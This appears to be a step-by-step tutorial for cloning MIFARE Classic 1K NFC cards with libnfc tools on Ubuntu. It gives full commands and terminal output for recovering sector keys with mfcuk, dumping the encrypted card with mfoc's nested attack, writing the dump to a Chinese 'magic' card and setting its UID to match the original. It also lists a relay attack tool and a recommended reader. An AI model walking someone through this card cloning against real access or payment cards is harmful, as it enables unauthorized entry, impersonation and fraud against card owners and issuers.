Restore Dumping File back to Card

ubuntu@ubuntu:~$ sudo nfc-mfclassic -h

Output:

Usage: nfc-mfclassic r|R|w|W a|b [ [f]]
r|R|w|W - Perform read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
*** note that unlocked write will attempt to overwrite block 0 including UID
*** unlocked read does not require authentication and will reveal A and B keys
*** unlocking only works with special Mifare 1K cards (Chinese clones)
a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
- MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
- MiFare Dump (MFD) that contain the keys (optional)
f - Force using the keyfile even if UID does not match (optional)

ubuntu@ubuntu:~$ sudo nfc-mfclassic W A cardtocopy.dmp

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 01 23 45 67
SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Writing 64 blocks |................................................................|
Done, 64 of 64 blocks written.

Recover keys and dump content into file

MFCUK – MiFare Classic Universal toolKit.

Recovering a key without know any key, and it took few minutes to a couple of ten minutes to recover a key

ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:A -v 2

INFO: block 3 recovered KEY: 8c9c83f6d192

ubuntu@ubuntu:~$ sudo mfcuk -C -R 0:B -v 2

INFO: block 3 recovered KEY: f4a9ef2afc6d

Some time we get recoverable error, but decrypt process is still fine.
RECOVER: 0mfcuk: ERROR: mfcuk_key_recovery_block() (error code=0x03)

MFOC is an open source implementation of “offline nested” attack by Nethemba.

If a card uses at least one block encrypted with a default key, all the other keys can be extracted in minutes. If the card does not use default keys, one key for a sector can be retrieved using the MFCUK library, after which this library can be used.

By use keys for a sectors are retrieved using the MFCUK library:

sudo mfoc -k 8c9c83f6d192 -k f4a9ef2afc6d -P 500 -O cardtocopy.dmp

Output:

The custom key 0x8c9c83f6d192 has been added to the default keys
The custom key 0xf4a9ef2afc6d has been added to the default keys
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 2a e9 0e 52
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
...

The content of encrypted card is dumping into “cardtocopy.dmp”

Format Mifare Magic Card

ubuntu@ubuntu:~$ sudo nfc-mfsetuid -h

Output:

Usage: nfc-mfsetuid [OPTIONS] [UID]
Options:
-h Help. Print this message.
-f Format. Delete all data (set to 0xFF) and reset ACLs to default.
-q Quiet mode. Suppress output of READER and CARD data (improves timing).

Specify UID (4 HEX bytes) to set UID, or leave blank for default '01234567'.
This utility can be used to recover cards that have been damaged by writing bad
data (e.g. wrong BCC), thus making them non-selectable by most tools/readers.

*** Note: this utility only works with special Mifare 1K cards (Chinese clones).

ubuntu@ubuntu:~$ sudo nfc-mfsetuid -f

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 01 23 45 67 00
Sent bits: 93 70 01 23 45 67 00 d0 6f
Received bits: 08 b6 dd

Found tag with
UID: 01234567
ATQA: 0004
SAK: 08

Sent bits: 50 00 57 cd
...

Confirm format is complete:

ubuntu@ubuntu:~$ sudo mfoc -P 500 -O blank-chinese.dmp

Output:

ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 01 23 45 67
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
...

Set UID at Mifare Magic Card

Get UID from Magic Card:

ubuntu@ubuntu:~$ sudo nfc-anticol

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened

Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 00 dc 44 20 b8
Sent bits: 93 70 00 dc 44 20 b8 37 c9
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd

Found tag with
UID: 00dc4420
ATQA: 0004
SAK: 08

Set UID at Magic Card:

ubuntu@ubuntu:~$ sudo nfc-mfsetuid 2ae90e52

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened
Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 00 dc 44 20 b8
Sent bits: 93 70 00 dc 44 20 b8 37 c9
Received bits: 08 b6 dd

Found tag with
UID: 00dc4420
ATQA: 0004
SAK: 08

Sent bits: 50 00 57 cd
Sent bits: 40 (7 bits)
Received bits: a (4 bits)
Sent bits: 43
Received bits: 0a
Sent bits: a0 00 5f b1
Received bits: 0a
Sent bits: 2a e9 0e 52 9f 08 04 00 46 59 25 58 49 10 23 02 11 ef
Received bits: 0a

Get UID from Magic Card:

ubuntu@ubuntu:~$ sudo nfc-anticol

Output:

NFC reader: SCM Micro / SCL3711-NFC&RW opened

Sent bits: 26 (7 bits)
Received bits: 04 00
Sent bits: 93 20
Received bits: 2a e9 0e 52 9f
Sent bits: 93 70 2a e9 0e 52 9f 6e 24
Received bits: 08 b6 dd
Sent bits: 50 00 57 cd

Found tag with
UID: 2ae90e52
ATQA: 0004
SAK: 08

The Software include in Mifare Live CD

nfc-anticol - Demonstration of NFC anti-collision tool
nfc-dep-initiator - send/received data as D.E.P. initiator
nfc-dep-target - send/received data as D.E.P. target
nfc-emulate-forum-tag2 - NFC Forum tag type 2 emulation
nfc-emulate-forum-tag4 - NFC Forum tag type 4 emulation
nfc-emulate-tag - Simple tag emulation command line
nfc-emulate-uid - NFC target emulation command line
nfc-list - list NFC targets
nfc-mfclassic - MIFARE Classic command line tool
nfc-mfsetuid -M1 special card UID setting and recovery
nfc-mfultralight - MIFARE Ultralight command line tool
nfc-poll - poll first available NFC target
nfc-read-forum-tag3 - Extract NDEF Tag Type 3
nfc-relay - Relay attack command line tool
nfc-relay-picc - Relay for ISO14443-4
nfc-scan-device - Scan NFC devices

Some USB/NFC help applications

Find USB device details in Linux using lsusb command

As a Linux User we should know USB bus details as well as devices connected. In this post we will see how to use lsusb command to display different USB properties.

Example1: List all the USB ports available

ubuntu@ubuntu:~$ sudo lsusb

Output:


Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 005 Device 002: ID 04e6:5591 SCM Microsystems, Inc.
Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 002 Device 002: ID 13ee:0001 MosArt
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

04e6:5591 SCM Microsystems, Inc.” means SCM reader is correctly connected.

Use nfc-list to find out if nfc driver is correctly installed.

ubuntu@ubuntu:~$ sudo nfc-list

Output:


nfc-list uses libnfc 1.7.0
NFC device: SCM Micro / SCL3711-NFC&RW opened

Magic Mifare Classic 1k Cards

UID Changeable Mifare Classic 1k Compatible Card:

  1. UID card block 0 (UID’s block) can be modified arbitrarily.
  2. block 0 directly with normal mifare read-write device modification, don’t need special equipment.
  3. card of the default password for 12 F,FFFFFFFFFFFF.

This card works the same as the normal Mifare Classic 1K 13.56 Mhz cards, for Mifare 1K S50 standard. Only the Sector 0 Block Zero which is known as the Serial Number/Manufacturers Block(Chip UID) could be programmed by live CD to any UID you want.

Download NFC-Tools Live CD.

SCM SCL3711

SCM SCL3711

fcc_scl3711

NFC-Tools Devices compatibility matrix

NFC-Tools recommended Reader

Some users ask for what device should buy to use with libnfc.
Depending on what kind of device you are looking for, we recommend these devices: ATM, there is no good flat reader for desktop computer, there is a ASK LoGO but does not allow to act as target, but there is a good dongle so we recommend an SCM SCL3711

SCM Microsystems SCL3711 User Manual

SCM Microsystems SCL3711 Reference Manual – version 1.6